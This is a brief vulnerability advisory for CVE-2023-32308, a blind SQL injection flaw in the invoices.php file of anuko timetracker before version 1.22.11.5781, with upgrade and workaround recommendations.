CVE-2023-32308

Name of the Vulnerable Software and Affected Versions anuko timetracker versions prior to 1.22.11.5781

Description The issue is related to a Boolean-based blind SQL injection vulnerability in the invoices.php file of anuko timetracker, an open source time tracking system. This vulnerability existed due to a coding error after validating parameters in POST requests, where there was no check for errors before adjusting the invoice sorting order. As a result, it was possible to craft a POST request with malicious SQL for the Time Tracker database.

Recommendations For versions prior to 1.22.11.5781, upgrade to version 1.22.11.5781 or later to resolve the issue. As a temporary workaround for users unable to upgrade, consider inserting an additional check for errors in a condition before calling ttGroupHelper::getActiveInvoices() in invoices.php.